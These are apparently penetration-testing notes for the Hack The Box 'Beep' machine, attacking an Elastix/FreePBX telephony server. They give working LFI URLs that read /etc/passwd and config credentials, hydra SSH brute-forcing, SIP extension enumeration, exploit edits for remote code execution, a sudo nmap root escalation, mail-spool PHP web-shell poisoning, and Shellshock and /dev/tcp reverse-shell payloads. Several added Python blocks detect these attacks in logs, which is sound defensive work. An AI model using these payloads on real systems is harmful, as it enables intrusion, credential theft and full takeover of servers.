Elastix FreePBX
Elastix LFI graph.php
Elastix version: FreePBX 2.8.14
google "elastix vulnerabilities"
Elastix 2.2.0 graph.php Local File Inclusion (LFI)
amportal.conf - the config file; reading it through the LFI gives up the credentials
If you find a user/password pair, fire up hydra and try it against SSH (below)
searchsploit elastix
searchsploit -m 37637 ..copies the LFI exploit locally
https://$IP/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
https://$IP/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action
Ignore users with nologin
vim > :g/nologin/d ..deletes every line containing 'nologin'
Fix the formatting of the dumped file:
tr '#' '\n' < input.txt > output.txt
grep -i -E 'user|pass|host|name' output.txt
hydra -L users.txt -P pass.txt ssh://$IP
Passwords found here.. could be reused as 'root' :)
(HTB: Beep)
Elastix LFI vtigercrm
vTiger CRM 5.1.0
gobuster found the 'vtigercrm' folder
searchsploit vtiger found: Local File Inclusion - 18770.txt
Base URL: https://$IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php
Append one of the following as the module_name parameter:
?module_name=english.php HTTP/1.1
?module_name=../../../../../../../../etc/passwd%00
?module_name=../../../../../../../../proc/self/status%00
?module_name=../../../../../../../../var/mail/asterisk%00
View Page Source! (the included file's contents are embedded in the HTML)
Found: uid 100 (asterisk) from /proc/self/status, the passwd file, and a readable mail spool
PBX Extensions
https://$IP/panel ..shows the extensions (if you can access it)
SIPVicious: Find active 'extensions' by wardialing your PBX
sudo apt install sipvicious
> svmap 10.129.113.87 -vv
+--------------------+---------------------+-------------+
| SIP Device | User Agent | Fingerprint |
+====================+=====================+=============+
| 10.129.113.87:5060 | FPBX-2.8.1(1.8.7.0) | disabled |
+--------------------+---------------------+-------------+
> svwar -h
> svwar $IP
> svwar -D -m INVITE $IP
> svwar -D -m INVITE $IP -e100-300 --force ..-D tries default extensions, -e sets the range
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233 | reqauth |
+-----------+----------------+
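The svwar output above works because Asterisk answers differently for an extension that exists (authentication required) and one that does not. The same difference shows up in the PBX's own log, which is where a defender catches the scan. The following is an added example, not code from the original notes or from SIPVicious: it parses failed REGISTER/INVITE notices and flags any source that probes many distinct extensions. The log line formats are modelled on Asterisk 1.8 chan_sip NOTICE messages and are an assumption; the sample lines, IPs and PIDs are constructed.

```python
"""Spot svwar-style SIP extension enumeration in Asterisk log notices.

Added example (not from the original notes). The line formats are modelled
on Asterisk 1.8 chan_sip NOTICE messages for failed REGISTER and INVITE
attempts; treat them as an assumption and adjust the regexes to your logs.
"""
import re
from collections import defaultdict

# Constructed sample lines; IPs, PIDs and times are made up.
SAMPLE_ASTERISK_LOG = """\
[Mar 10 12:00:01] NOTICE[2231] chan_sip.c: Registration from '"100" <sip:100@10.129.113.87>' failed for '10.10.14.5:5060' - No matching peer found
[Mar 10 12:00:01] NOTICE[2231] chan_sip.c: Registration from '"101" <sip:101@10.129.113.87>' failed for '10.10.14.5:5060' - No matching peer found
[Mar 10 12:00:01] NOTICE[2231] chan_sip.c: Registration from '"102" <sip:102@10.129.113.87>' failed for '10.10.14.5:5060' - No matching peer found
[Mar 10 12:00:02] NOTICE[2231] chan_sip.c: Registration from '"103" <sip:103@10.129.113.87>' failed for '10.10.14.5:5060' - No matching peer found
[Mar 10 12:00:02] NOTICE[2231] chan_sip.c: Registration from '"104" <sip:104@10.129.113.87>' failed for '10.10.14.5:5060' - No matching peer found
[Mar 10 12:00:02] NOTICE[2231] chan_sip.c: Registration from '"233" <sip:233@10.129.113.87>' failed for '10.10.14.5:5060' - Wrong password
[Mar 10 12:00:03] NOTICE[2231] chan_sip.c: Call from '' (10.10.14.5:5060) to extension '105' rejected because extension not found in context 'default'.
[Mar 10 12:45:10] NOTICE[2231] chan_sip.c: Registration from '"233" <sip:233@10.129.113.87>' failed for '192.168.1.50:5060' - Wrong password
"""

# Failed REGISTER: "Registration from '<from-header>' failed for 'ip:port' - reason"
REGISTER_RE = re.compile(
    r"Registration from '(?P<from>[^']*)' failed for '(?P<ip>[^':]+)(?::\d+)?' - (?P<reason>.*)$"
)
# Failed INVITE: "Call from '' (ip:port) to extension 'NNN' rejected because ..."
INVITE_RE = re.compile(
    r"Call from '[^']*' \((?P<ip>[^:)]+)(?::\d+)?\) to extension '(?P<ext>[^']+)' rejected"
)
# Pull the user part out of the From header's SIP URI
SIP_USER_RE = re.compile(r"sip:([^@>]+)@")


def parse_failures(text):
    """Yield (source_ip, extension, reason) for each failed REGISTER/INVITE notice."""
    for line in text.splitlines():
        m = REGISTER_RE.search(line)
        if m:
            user = SIP_USER_RE.search(m["from"])
            yield m["ip"], (user.group(1) if user else "?"), m["reason"].strip()
            continue
        m = INVITE_RE.search(line)
        if m:
            yield m["ip"], m["ext"], "extension not found"


def find_enumerators(text, threshold=5):
    """Return [(ip, distinct_extensions_tried)] for sources at or above threshold.

    A single wrong password is normal; one source walking many different
    extensions in a short time is a wardialer.
    """
    tried = defaultdict(set)
    for ip, ext, _reason in parse_failures(text):
        tried[ip].add(ext)
    return sorted((ip, len(exts)) for ip, exts in tried.items() if len(exts) >= threshold)


if __name__ == "__main__":
    for ip, count in find_enumerators(SAMPLE_ASTERISK_LOG):
        print(f"{ip} probed {count} distinct extensions")
```

The "Wrong password" line for 233 is the server-side view of the "reqauth" row in the svwar table: the extension exists, the others do not. Setting alwaysauthreject=yes in sip.conf makes Asterisk return the same rejection for unknown and known extensions, which removes the oracle svwar relies on; a fail2ban jail on these notices adds rate limiting on top.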
Remote Code Execution
FreePBX 2.8.14
searchsploit freepbx 2.8.14
Found: 2.10.10 / Elastix 2.2.0 - Remote Code Execution: php/webapps: 18650.py
Did you read the notes in the exploit?
Elastix often allows the asterisk user to run nmap interactively via sudo (root shell, see below)
searchsploit -m 18650
vim 18650
lhost = $MyIP
rhost = $IP
extension='1000' ..default extension
extension='238' ..found with svwar
url = 'https://....'
urllib.urlopen(url) ..original
print(url) ..to troubleshoot
nc -nvlp 4444
whoami
asterisk
sudo nmap --interactive
nmap> !sh
id ..root
Email PHP injection
Requires:
smtp:25 open
user/pass of an email account
an LFI that can open/execute the mail file under the same account
-------------
smtp:25
telnet $IP
EHLO mutatedknutz.beep.localdomain ..extended hello
VRFY hacked@localhost ..rejected
VRFY asterisk@localhost ..accepted (user exists)
mail from:hacked@hacked.com
rcpt to:asterisk@localhost
data
Subject:Testing!
Hello ..test #1
<?php echo "Php success"; ?> ..test #2
<?php echo system($_REQUEST['command']); ?> ..test #3
.
quit
-------------
Use the LFI to include the mail spool (the injected PHP executes on inclusion):
Base URL: https://$IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php
?module_name=../../../../../../../../var/mail/asterisk%00&command=whoami HTTP/1.1
?module_name=../../../../../../../../var/mail/asterisk%00&command=hostname HTTP/1.1
?module_name=../../../../../../../../var/mail/asterisk%00&command=bash -i >& /dev/tcp/10.x.x.x/5151 0>&1 HTTP/1.1
URL-encode the command value (e.g. in Burp) before sending
nc -nvlp 5151
whoami
asterisk !!
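Every request in the graph.php, sortfieldsjson.php and poisoned-mail sections above has the same shape in the web server's access log: a traversal sequence, a %00 terminator and a sensitive target path, with an extra command= parameter once the mail spool is being included. The block below is an added example, not code from the original notes or from Elastix: a defender-side scan over Apache access log lines that decodes each query parameter (repeatedly, to catch double encoding) and reports those indicators per request. The sample log lines, IPs and timestamps are constructed.

```python
"""Flag LFI / path-traversal attempts in Apache access log lines.

Added example (not from the original notes): a defender-side check for the
request shapes shown above (../ traversal, %00 truncation, sensitive files,
and an extra command= parameter riding on the included-file request).
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log lines; the IPs and timestamps are made up.
SAMPLE_LOG = """\
10.10.14.5 - - [10/Mar/2024:12:00:01 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 5123
10.10.14.5 - - [10/Mar/2024:12:00:02 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1833
10.10.14.5 - - [10/Mar/2024:12:00:03 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00&command=whoami HTTP/1.1" 200 302
192.168.1.20 - - [10/Mar/2024:12:00:04 +0000] "GET /vtigercrm/index.php?module=Accounts&action=index HTTP/1.1" 200 9021
192.168.1.21 - - [10/Mar/2024:12:00:05 +0000] "POST /admin/config.php HTTP/1.1" 302 0
"""

# Common Log Format prefix: client, identd, user, [timestamp], "request", status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')
SENSITIVE_RE = re.compile(
    r'/etc/passwd|/etc/shadow|amportal\.conf|/var/mail/|/var/spool/mail/|/proc/self/', re.I
)
COMMAND_PARAMS = {"command", "cmd", "exec"}


def decode_param(value, rounds=3):
    """URL-decode repeatedly so double-encoded traversal (%252e%252e) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_target(target):
    """Return sorted indicator names for one request target (path + query)."""
    indicators = set()
    has_command = False
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_param(value)
        if TRAVERSAL_RE.search(value):
            indicators.add("traversal")
        if "\x00" in value:
            indicators.add("null-byte")          # %00 truncates the suffix PHP appends
        if SENSITIVE_RE.search(value):
            indicators.add("sensitive-file")
        if name.lower() in COMMAND_PARAMS and value:
            has_command = True
    # A command= parameter on a traversal request is the poisoned-mail RCE pattern.
    if has_command and "traversal" in indicators:
        indicators.add("command-param")
    return sorted(indicators)


def scan_log(text):
    """Return one finding per log line that carries at least one LFI indicator."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        indicators = analyse_target(m["target"])
        if indicators:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": m["status"],
                "target": m["target"], "indicators": indicators,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], ",".join(f["indicators"]), f["target"][:70])
```

The %00 truncation these payloads depend on only works on PHP older than 5.3.4, where null bytes in file paths were still accepted, so the version in play is itself a finding; a 200 status on such a request means the include most likely succeeded.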
Metasploit
Optional method: "vtiger soap upload"
MSF SSL Issue/Fix: 6783
searchsploit vtigercrm
msf: use exploit/multi/http/vtiger_soap_upload
PBX Shellshock
() { :;}; echo; /usr/bin/wget https://$IP ..test
() { :;}; bash -i >& /dev/tcp/$IP/443 0>&1 ..reverse
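Both payloads above begin with the bash function-definition token "() {", which is the one constant in every Shellshock variant regardless of what follows it. The block below is an added example, not code from the original notes: it scans Apache combined-format log lines for that token in the Referer and User-Agent fields, the header values a CGI handler exports into the environment. The sample lines, IPs, paths and timestamps are constructed.

```python
"""Detect Shellshock-style function-definition prefixes in HTTP header fields.

Added example (not from the original notes): the bash payloads shown above
start with the "() {" token; a defender can flag that token in any header
value that a CGI handler would export as an environment variable.
"""
import re

# Constructed Apache combined-format lines (IPs, paths and timestamps are made up).
SAMPLE_COMBINED_LOG = """\
10.10.14.5 - - [10/Mar/2024:13:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo; /usr/bin/wget https://10.10.14.5"
10.10.14.5 - - [10/Mar/2024:13:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "(){ :;}; echo vulnerable" "curl/7.68.0"
192.168.1.20 - - [10/Mar/2024:13:00:03 +0000] "GET /admin/ HTTP/1.1" 200 4211 "https://10.129.113.87/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/120.0"
192.168.1.21 - - [10/Mar/2024:13:00:04 +0000] "GET /panel HTTP/1.1" 302 0 "-" "curl/7.68.0"
"""

# Combined Log Format: CLF prefix plus quoted "referer" and "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Exported-function prefix, allowing the whitespace variants seen in the wild;
# a plain "(X11;" in a browser UA does not match because no "{" follows.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def shellshock_fields(headers):
    """Return the names of header fields whose value carries the '() {' prefix."""
    return sorted(name for name, value in headers.items() if SHELLSHOCK_RE.search(value))


def scan_combined_log(text):
    """Return one finding per line with a Shellshock token in Referer or User-Agent."""
    findings = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue
        hit = shellshock_fields({"referer": m["referer"], "user-agent": m["agent"]})
        if hit:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "request": m["request"], "fields": hit,
            })
    return findings


if __name__ == "__main__":
    for f in scan_combined_log(SAMPLE_COMBINED_LOG):
        print(f["ip"], f["request"], "->", ",".join(f["fields"]))
```

Matching the token rather than any particular command keeps the rule stable across payload variants; the fix is still a patched bash, since the token only matters to an unpatched one that imports functions from the environment.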